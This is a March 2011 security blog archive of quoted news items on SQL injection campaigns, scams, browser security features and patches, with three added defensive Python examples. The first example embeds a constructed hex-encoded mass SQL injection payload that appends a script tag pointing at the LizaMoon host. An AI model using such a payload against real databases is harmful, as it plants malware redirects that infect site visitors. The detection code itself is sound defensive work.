March 2011 - Posts
Please be careful with all website links that are presented to you in Facebook, email, or web searches. Attackers are using SQL injection attacks to seed vulnerable websites with code that redirects visitors to FAKEAV and other malware.
LizaMoon Mass SQL Injection Attack continues
QUOTE: Websense Security Labs discovered a mass-injection campaign infecting more than 28,000 URLs, including a few Apple iTunes URLs that redirect users to a rogue AV site. Attackers have launched a large-scale SQL injection attack that has compromised several thousand legitimate Websites, including a few catalog pages from Apple's iTunes music store.
Websense Security Labs and the Websense Threatseeker Network discovered the mass-injection campaign that compromised over 28,000 URLs, including several iTunes URLs, according to Patrik Runald, a senior manager of security research at Websense Security Labs, who posted an alert on the Security Labs blog. The mass-injection attack has been named LizaMoon after the domain hosting the attack code.
Unlike the recent SQL injection attack that affected MySQL.com and Sun.com, this mass injection is a SQL injection attack against a large volume of legitimate sites. The LizaMoon attack inserts a line of code referencing a PHP script that redirects users to another malware site.
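The mechanics of a mass injection like this are worth seeing end to end. The following is an added example (not code from this blog, from Websense, or from the LizaMoon campaign): it decodes the hex-encoded DECLARE/CAST/EXEC payload that mass-injection campaigns of this period appended to numeric query parameters, pulls the injected script host out of it, and scans stored page content for script tags pointing off-site. The log lines, the injected SQL, and the host lizamoon.com are constructed for the demo, and the single UPDATE stands in for the cursor loop over sysobjects/syscolumns that the real payloads used to hit every text column.

```python
"""Decode hex-encoded mass-SQL-injection payloads found in web server logs and
report the external script hosts they try to plant in page content.

Added example: not code from the original post, from Websense or from the
LizaMoon campaign. Assumes the usual delivery form of the era: a
DECLARE/SET @S=CAST(0x... AS VARCHAR)/EXEC(@S) sequence appended to a numeric
parameter. Log lines, injected SQL and the host name are constructed.
"""
import re
from urllib.parse import unquote_plus, urlparse

# The attacker hides the real T-SQL as a hex literal so the visible request
# carries no quotes or keywords a naive filter would catch; EXEC(@S) runs it.
CAST_HEX = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.IGNORECASE)
SCRIPT_SRC = re.compile(
    r"<script[^>]*\bsrc\s*=\s*['\"]?(https?://[^'\">\s]+)", re.IGNORECASE)

# Constructed stand-in for the injected statement. Real campaigns walked every
# text column of every table via a sysobjects/syscolumns cursor; the effect on
# each row is the same: append a script tag that points at the attacker.
INJECTED_SQL = ("UPDATE products SET descr=descr+"
                "'<script src=http://lizamoon.com/ur.php></script>'")

# Constructed IIS-style log lines: one normal request, one carrying the payload.
SAMPLE_LOG = [
    "2011-03-31 10:15:02 GET /catalog.asp id=12 200",
    "2011-03-31 10:15:03 GET /catalog.asp id=12;DECLARE%20@S%20VARCHAR(4000);"
    "SET%20@S=CAST(0x" + INJECTED_SQL.encode().hex().upper()
    + "%20AS%20VARCHAR(4000));EXEC(@S);-- 200",
]


def decode_hex_payloads(log_line):
    """Return the SQL text hidden in each CAST(0x... AS VARCHAR) literal."""
    decoded = unquote_plus(log_line)      # the request is URL-encoded in the log
    payloads = []
    for blob in CAST_HEX.findall(decoded):
        raw = bytes.fromhex(blob)
        # NVARCHAR payloads are UTF-16LE and show up as NUL-interleaved bytes
        if b"\x00" in raw:
            payloads.append(raw.decode("utf-16-le", errors="replace"))
        else:
            payloads.append(raw.decode("latin-1"))
    return payloads


def script_hosts(text):
    """Host of every absolute <script src=...> found in SQL or HTML text."""
    return [urlparse(url).hostname.lower() for url in SCRIPT_SRC.findall(text)]


def scan_log(lines):
    """(line number, host) for every injected script reference in the log."""
    hits = []
    for n, line in enumerate(lines, 1):
        for sql in decode_hex_payloads(line):
            hits.extend((n, host) for host in script_hosts(sql))
    return hits


def untrusted_scripts(html, trusted_hosts):
    """Script hosts in a served page that are not on the site's own allowlist.
    Run this over stored page content to find rows the injection already hit."""
    allowed = {h.lower() for h in trusted_hosts}
    return [h for h in script_hosts(html) if h not in allowed]


if __name__ == "__main__":
    for n, host in scan_log(SAMPLE_LOG):
        print(f"log line {n}: injection points visitors at {host}")
    page = ('<script src="https://www.example.com/app.js"></script>'
            '<script src=http://lizamoon.com/ur.php></script>')
    print("untrusted script hosts in page:", untrusted_scripts(page, {"www.example.com"}))
```

The real fix on the server side is parameterized queries for every value that reaches SQL; the log decoder above is for finding out whether a site was hit, and the content scan for finding which rows still carry the tag.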
While this McAfee Labs (AVERT) warning pertains primarily to the UK, please be careful with all EMAIL messages that seem to come from the IRS or other official agencies. Remember that the IRS does not initiate contact with taxpayers by email, and the criminals behind these messages usually want personal or bank account information. Only work through trusted sources.
Tax Season - Beware of scams and fake messages
QUOTE: As the saying goes: Death and taxes are the only constants in life. This adage can be applied to scams on the Internet as well. Every tax season we can count on scams like these to raise their heads and try to bilk users out of their identity information and hard-earned money. A few of the messaging and spam researchers at McAfee Labs sent me some samples earlier today that I would like to share.
Trend Micro has just released a new beta version of a standalone FAKEAV removal tool. This new process-based cleaner appears to be comprehensive. It can be downloaded free of charge and run in Safe Mode to clean these complex infections.
Trend Micro - Creates new FAKEAV standalone removal tool
QUOTE: Fake Antivirus (FakeAV) threats have been rampant in the past few years. Various FAKEAV variants have infected millions of PCs and are continuously spreading worldwide. One reason why FAKEAV infections have become well-known to users is because they have visual payloads. Variants of the malware family often display pop-up messages telling users that their machines have been infected. This may cause panic among users, pressuring them to purchase rogue antivirus applications in the hope of resolving the issue. Users, however, should never purchase antivirus software from unknown sources.
eWeek shares this article on IE9, noting many new improvements in functionality and security.
Internet Explorer 9 - Ten Reasons to Use it
QUOTE: Microsoft has officially launched Internet Explorer 9. Although the browser’s history has been spotty, Internet Explorer 9 is the one new browser that every user should be trying. The browser, which is being touted by many reviewers already as the best version of the software the company has ever released, follows a long line of predecessors that at times won customers over and at other times failed miserably. But it's a new day for Microsoft and Internet Explorer. The time has finally come for the company to face Google's Chrome browser head-on.
1. It's fast
2. A vastly improved interface
3. It's awfully Chrome-like
4. The Pinned Sites feature is nice
5. It's much more secure
6. It's a big step up over previous versions
7. The enterprise will be happy
8. A new Microsoft?
9. Putting an end to tracking
10. It's another good reason to ditch Windows XP
Please be careful with links that might be presented to you in Facebook. Another new XSS worm is circulating that can automatically post messages with malicious links on Facebook walls of your friends and contacts.
Facebook - New XSS Worm Allows Automatic Wall Posts
QUOTE: Currently a new and unpatched cross-site scripting (XSS) vulnerability in Facebook is being widely used to automatically post messages to other users’ walls. The vulnerability was used for some time in some smaller cases; however, it is now widely being used for the first time by many different groups—especially in Indonesia, where we are seeing thousands of infected messages being posted by unknowing users.
Any user who is logged into Facebook and visits a site that contains such an element will automatically post an arbitrary message to his or her wall. There is no other user interaction required, and there are no tricks involved, like clickjacking. Just visiting an infected website is enough to post a message that the attacker has chosen. Therefore it should be of no surprise that some of those messages are spreading very fast through Facebook.
Mouse Training Company - Free MS Office Training Manuals
QUOTE: We have made all our MS Office training manuals available to download for free. The files are in PDF format that will allow you Save, Print or Email to yourself. If you are not a Mouse Training client and would like to make use of the manuals, we kindly ask that you provide a HTML link back to our site from your company website. Please use the following information for the link. The manuals are copyright protected under Wiki Commons License. This agreement will allow you to download, edit, distribute and store the manuals without limit.
Internet Private Browsing - IE, Firefox, and Chrome
QUOTE: Chrome, Firefox, and Internet Explorer released major updates this week. The timing may be a coincidence or not but there is a very interesting feature that all three browsers are developing almost at the same time—private browsing.
Each of the three approaches to private browsing has its merits:
• Mozilla Firefox advocates the use of a new HTTP header that, with time, all websites should honor
• Google Chrome instead uses a blacklist of websites published by Google
• Microsoft Internet Explorer is similar, except that it allows for a more granular control over lists
Finally, private browsing! But how does this change my life? Well, for starters, you can now minimize the amount of targeted advertising you’re exposed to. That’s if you want to, of course. The key element is choice. The three main browsers have chosen three very different ways to implement privacy.
Some of the key security enhancements found in the new version of Firefox are listed below:
Firefox 4 Security Features
Firefox 4 - All Features (Technical writeup)
QUOTE: Like no other release before it, Firefox 4 includes a number of significant security features. These features address attacks that are particularly hard for developers to avoid and in which the browser, more so than the server, is the victim.
These attacks, Cross Site Scripting (XSS), redirects to HTTP pages from HTTPS, and Clickjacking, use vulnerable web applications more as a mirror to bounce attacks into the browser. The browser can provide meaningful protection against these attacks, unlike for more server-centric attacks like SQL injection, for which the attacker is in full control of the client.
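Each of the three attack classes named in that writeup maps to a response header that Firefox 4 enforces: Content Security Policy against XSS (Firefox 4 reads it under the prefixed name X-Content-Security-Policy, with "allow" where the later standard says default-src), HTTP Strict Transport Security against HTTPS-to-HTTP downgrades, and X-Frame-Options against clickjacking. The following is an added example (not code from this blog, from Mozilla, or from the writeup quoted above) that audits a set of response headers for those three defenses and shows a weak header set next to a hardened one; both header sets are constructed for the demo. The same point applies to the Facebook XSS worm post above: these headers help only when the vulnerable site itself sends them.

```python
"""Audit HTTP response headers for the three browser-enforced defenses that
Firefox 4 supports, and show a weak header set next to a hardened one.

Added example, not code from the original post or from Mozilla. Mapping
assumed here: CSP against XSS, HSTS against HTTPS-to-HTTP downgrade,
X-Frame-Options against clickjacking. Both header sets are constructed.
"""

# Constructed: a typical 2011 response, nothing for the browser to enforce.
WEAK_HEADERS = {
    "Content-Type": "text/html; charset=utf-8",
    "Set-Cookie": "session=abc123; Path=/",
}

# Constructed: the same response with every defense switched on.
HARDENED_HEADERS = {
    "Content-Type": "text/html; charset=utf-8",
    "Set-Cookie": "session=abc123; Path=/; Secure; HttpOnly",
    # Firefox 4 form: prefixed header, "allow" directive ...
    "X-Content-Security-Policy": "allow 'self'; script-src 'self' https://cdn.example.com",
    # ... and the later standard form for browsers that implement it.
    "Content-Security-Policy": "default-src 'self'; script-src 'self' https://cdn.example.com",
    # Only meaningful on an HTTPS response: the browser then refuses plain HTTP
    # to this host for max-age seconds, so a redirect to http:// fails closed.
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "X-Frame-Options": "DENY",
}


def _get(headers, name):
    """Case-insensitive header lookup (header names are case-insensitive)."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def parse_csp(policy):
    """Split a policy into {directive: [sources]}; 'allow' is the Firefox 4
    spelling of default-src and is normalised to it."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            name = tokens[0].lower()
            directives["default-src" if name == "allow" else name] = tokens[1:]
    return directives


def csp_blocks_inline_script(policy):
    """Reflected XSS usually lands as inline script; a policy that governs
    script-src (directly or via default-src) without 'unsafe-inline' stops it."""
    d = parse_csp(policy)
    sources = d.get("script-src", d.get("default-src"))
    if sources is None:          # no directive covers scripts at all
        return False
    return "'unsafe-inline'" not in sources


def hsts_max_age(value):
    """max-age from a Strict-Transport-Security value, 0 if absent or invalid."""
    for part in value.split(";"):
        key, _, val = part.strip().partition("=")
        if key.strip().lower() == "max-age" and val.strip().isdigit():
            return int(val)
    return 0


def audit(headers):
    """{attack: mitigated?} for the three attack classes the writeup names."""
    csp = (_get(headers, "Content-Security-Policy")
           or _get(headers, "X-Content-Security-Policy"))
    xfo = (_get(headers, "X-Frame-Options") or "").strip().upper()
    return {
        "xss": bool(csp) and csp_blocks_inline_script(csp),
        "https_downgrade": hsts_max_age(_get(headers, "Strict-Transport-Security") or "") > 0,
        "clickjacking": xfo in ("DENY", "SAMEORIGIN"),
    }


if __name__ == "__main__":
    for label, hdrs in (("weak", WEAK_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(label, audit(hdrs))
```

Note that the HSTS check only tells you the header is present; the browser ignores it on a plain HTTP response, so the audit has to be run against the site's HTTPS responses.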
All Apple Mac OS X users should update their systems as prompted. There were 53 issues addressed in several components, including third-party software.
Apple Mac OS X - Security Update 2011-001
Mac OS X v10.6.7 and Security Update 2011-001
QUOTE: This document describes the security content of Mac OS X v10.6.7 and Security Update 2011-001, which can be downloaded and installed via Software Update preferences, or from Apple Downloads.
We should be careful when sharing information on Facebook and other social networks. Sometimes I see friends sharing advance plans for a trip, vacation, or other outing. As these posts are often visible to the general public, there have indeed been accounts of people burglarized while away, with the criminals confessing that they learned of the trip from a Facebook post.
Social Network Users too friendly in sharing information publicly
QUOTE: It's old news that people are way too trusting on social media sites with their personal information, but it's no less disturbing for being banal. Would you walk around on the street holding a sign displaying your birthday, home town, and other data people commonly put in their Facebook public profiles?
ID Analytics's message is that you shouldn't be one of the low-hanging fruit. They have 3 rules of thumb for protecting your identity:
1. Be careful what you share
2. Protect what you have
3. Monitor, monitor, monitor
ID Analytics - In-depth study of Privacy
Below is an interesting post from the ISC (Internet Storm Center) on an unexplained sharp decrease in port 1434 attacks by the SQL Slammer worm, which first appeared in January 2003.
Port 1434: Sudden Slammer Decline?
QUOTE: We're interested to know what's happening out there. It has been observed through DShield data that Slammer traffic has had a sudden decline. I played with the data for a while. I could make it look like many things, such as slow and steady decline over time. However, the most compelling story is the one where the data drops on March 9 and 10.
Below is the DShield data and graph on port 1434 for March 2011. It's speculative at this point as to the cause of the sudden drop. Japan's earthquake or Patch Tuesday have been kicked around. I would be remiss if I did not mention Kevin Liston's series on Slammer Cleanup during October. We are loving the thought his great effort was a catalyst for the eradication of it. So go back and take a look at your data for us and share what you're seeing.
Please update the Adobe Flash component for your browsers as automatically prompted.
Adobe Flash Player update addresses a critical security issue (CVE-2011-0609)
QUOTE: A critical vulnerability has been identified in Adobe Flash Player 10.2.152.33 and earlier versions (Adobe Flash Player 10.2.154.18 and earlier versions for Chrome users) for Windows, Macintosh, Linux, and Solaris operating systems, and Adobe Flash Player 10.1.106.16 and earlier versions for Android. This vulnerability (CVE-2011-0609), as referenced in Security Advisory APSA11-01, could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being exploited in the wild against Flash Player in targeted attacks via a Flash (.swf) file embedded in a Microsoft Excel (.xls) file delivered as an email attachment.
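The delivery method in that advisory, a Flash file embedded inside an Excel attachment, is something a mail gateway or an incident responder can look for directly. The following is an added example (not code from this blog or from Adobe) that scans a file for SWF signatures and validates what follows them, so a hit is a real Flash header rather than three stray bytes. It relies on the documented SWF header layout: a 3-byte signature ("FWS" uncompressed, "CWS" with a zlib-compressed body; the LZMA "ZWS" form came later and is not handled), a version byte, and a 4-byte little-endian uncompressed length. The sample container is constructed: an OLE2 magic, padding, two tiny SWFs, and a decoy.

```python
"""Find Flash (SWF) objects hidden inside another file, such as an .xls
attachment, by scanning for SWF signatures and validating the header.

Added example, not code from the original post or from Adobe. The sample
container below is constructed, not a real malicious document.
"""
import struct
import zlib

MAX_SANE_VERSION = 50   # Flash Player versions were in the low tens in 2011


def _decompress_cws(data, pos):
    """Inflate a CWS body that starts after its 8-byte header; trailing
    container bytes are ignored by the streaming decompressor. None if not zlib."""
    try:
        return zlib.decompressobj().decompress(data[pos + 8:])
    except zlib.error:
        return None


def find_embedded_swf(data):
    """List (offset, kind, version, declared_length) for each plausible SWF.
    A hit needs a sane version and a body that checks out: for FWS the declared
    length fits in the container, for CWS the body inflates to that length."""
    hits = []
    for magic in (b"FWS", b"CWS"):
        pos = data.find(magic)
        while pos != -1:
            if pos + 8 <= len(data):
                version = data[pos + 3]
                length = struct.unpack_from("<I", data, pos + 4)[0]
                if 1 <= version <= MAX_SANE_VERSION and length >= 8:
                    if magic == b"FWS" and pos + length <= len(data):
                        hits.append((pos, "FWS", version, length))
                    elif magic == b"CWS":
                        body = _decompress_cws(data, pos)
                        if body is not None and len(body) == length - 8:
                            hits.append((pos, "CWS", version, length))
            pos = data.find(magic, pos + 1)
    return sorted(hits)


def extract_swf(data, pos):
    """Return the SWF at pos as an uncompressed FWS file, ready for a
    disassembler or a second scanner; None if nothing valid starts there."""
    for off, kind, version, length in find_embedded_swf(data):
        if off != pos:
            continue
        if kind == "FWS":
            return data[pos:pos + length]
        header = b"FWS" + bytes([version]) + struct.pack("<I", length)
        return header + _decompress_cws(data, pos)
    return None


# Constructed sample container: OLE2 (.xls/.doc) magic, padding, an FWS and a
# CWS of 13 zero bytes of body each, then a decoy "FWS" with a bad version.
_BODY = b"\x00" * 13
_FWS = b"FWS" + bytes([10]) + struct.pack("<I", 8 + len(_BODY)) + _BODY
_CWS = b"CWS" + bytes([10]) + struct.pack("<I", 8 + len(_BODY)) + zlib.compress(_BODY)
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
SAMPLE_CONTAINER = (OLE2_MAGIC + b"\x00" * 64 + _FWS + b"\x00" * 16 + _CWS
                    + b"FWS\xff\xff\xff\xff\xff" + b"\x00" * 8)

if __name__ == "__main__":
    for off, kind, version, length in find_embedded_swf(SAMPLE_CONTAINER):
        print(f"{kind} version {version} at offset {off}, {length} bytes uncompressed")
```

A real .xls stores the Flash object inside the OLE2 compound file, sometimes split across sectors, so a raw scan like this catches the common contiguous case and is a first pass, not a complete parser; a hit still warrants opening the document in a sandbox.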
Microsoft and other security firms continue to fight spam, botnets, and other sophisticated attacks. Recently a large and complex botnet known as Rustock was taken offline, reducing spam volumes and helping to improve Internet safety.
Microsoft's DCU unit disrupts Rustock botnet
QUOTE: Just over a year ago, we announced that the Microsoft Digital Crimes Unit (DCU), in cooperation with industry and academic experts, had successfully taken down the botnet Waledac in an operation known as “Operation b49”. Today, I’m happy to announce that based on the knowledge gained in that effort, we have successfully taken down a larger, more notorious and complex botnet known as Rustock. This botnet is estimated to have approximately a million infected computers operating under its control and has been known to be capable of sending billions of spam mails every day, including fake Microsoft lottery scams and offers for fake – and potentially dangerous – prescription drugs.
Thankfully, I've been able to move to IE8 for all home and work systems. However, there are some legacy web applications that still may not run under the latest versions of Internet Explorer. This new tool allows IE6 based applications to run in a virtualized mode in an IE8 tab if needed.
Browsium UniBrows Tool - Run IE6 inside IE8 or IE9
QUOTE: Most of the world may be running away from Internet Explorer 6 as fast as they can, especially now that it's officially 3 versions old, but there are users who can't make the decision so easily. Many businesses wrote in-house web-based applications, sometimes called "line of business apps," which relied on IE-specific features. In the long run they will have to change, but in the meantime Browsium has a solution that let these companies put off the decision even longer. UniBrows is a tool that IT can use to allow IE8 users on Windows XP or Windows 7 to run Internet Explorer 6 apps in a tab under IE8. Browsium says that they will support IE9 when the final release is available, so presumably that will be soon.
Browsium UniBrows Tool - Run IE6 inside IE8 or IE9
QUOTE: Move your organization to Windows 7 or IE8 on Windows XP and keep your IE6 line of business applications intact—without changing a single line of code. UniBrows enables IE6 web applications to run inside an IE8 tab, empowering your organization to streamline the migration process and avoid the complexity and costs of virtualization.
Within two hours of the magnitude 9.0 earthquake in Japan, a fake donation site had been established. Always be careful with e-cards, related email, or websites during holidays or major news events.
My thoughts, prayers, and deepest sympathies extend to those impacted by this great tragedy. Please always donate to mainstream sites like the Red Cross or others that are trustworthy. This way your money will be going to the people affected, rather than criminals.
Japanese Earthquake based scams and malware circulating
QUOTE: Approximately two hours after an 8.9 earthquake hit northeast Japan we spotted the first potential donation scam site. We’ve seen this before of course, but for a scam site to appear in just two hours–indexed and with content–is pretty quick in my experience. Hundreds of domains that could be related to the disaster have been registered so far today; we’re keeping an eye on them.
Always be careful with e-cards, related email, or websites during special holidays or news events.
St Patrick's Day based scams and malware circulating
QUOTE: I have blogged many times about how cybercriminals and scammers use holidays, sporting events, and disasters as lures in their never-ending schemes. Just like with tax season, every Valentine’s Day we see more scams. Most high-profile sporting events, such as the FIFA World Cup, inspire them; and certainly recent events like the earthquakes in Haiti, Chile, and Japan serve as bait for these schemes. St. Patrick’s Day finds itself in the same situation.
Mozilla's Firefox browser is a great complementary browser that I use in conjunction with Internet Explorer. After several months of beta testing, the new version has been promoted to the Release Candidate stage. This indicates that a production release will be forthcoming.
Firefox 4 - moves from Beta to Release Candidate stage
In recent years, malware has often found its way onto USB-based devices (e.g., flash drives, MP3 players, etc.). On infected PCs, many malware agents search for these devices and copy themselves there as well. Microsoft's latest change to AutoRun helps prevent these devices from starting programs automatically, and it is available through Windows Update now. The AutoRun process is a key technique used to infect other systems; users can still start these devices manually. It's a best practice to scan your portable media devices for malware periodically, and always when the source might be untrusted.
Microsoft’s Autorun update v2.1 now automatically deployed from Windows Update
QUOTE: Microsoft have moved their Windows Autorun V2.1 (967940) update patch from optional updates to automatic updates. This is the same patch that was released in last month’s patch Tuesday. When Windows update is next run, this patch will automatically be selected to apply to your machine. This is more likely to affect home users, as companies should be using group policies to control how USB autorun settings operate. Expect one or two calls from confused family members on why their favourite autorun USB stick application has stopped working.